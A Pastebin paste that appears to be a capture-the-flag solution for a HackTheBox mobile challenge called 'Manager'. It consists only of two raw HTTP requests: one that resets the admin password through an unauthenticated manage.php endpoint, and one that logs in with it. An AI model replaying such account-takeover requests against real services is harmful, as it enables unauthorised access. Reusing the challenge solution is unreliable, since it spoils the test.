Advertisement
Mr_hEx

HTB Mobile challenge Manager

Mar 22nd, 2024 (edited)
23
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.97 KB | None | 0 0
  1. // Telegram : @HTB0X
  2. #Step 1:
  3. POST /manage.php HTTP/1.1
  4. Host: 83.136.252.32:43470
  5. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  7. Accept-Language: ar,en-US;q=0.7,en;q=0.3
  8. Accept-Encoding: gzip, deflate, br
  9. Connection: close
  10. Upgrade-Insecure-Requests: 1
  11. Content-Type: application/x-www-form-urlencoded
  12. Content-Length: 30
  13.  
  14. username=admin&password=123!@#
  15.  
  16. #Step 2:
  17. POST /login.php HTTP/1.1
  18. Host: 83.136.252.32:43470
  19. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
  20. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  21. Accept-Language: ar,en-US;q=0.7,en;q=0.3
  22. Accept-Encoding: gzip, deflate, br
  23. Connection: close
  24. Upgrade-Insecure-Requests: 1
  25. Content-Type: application/x-www-form-urlencoded
  26. Content-Length: 30
  27.  
  28. username=admin&password=123!@#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement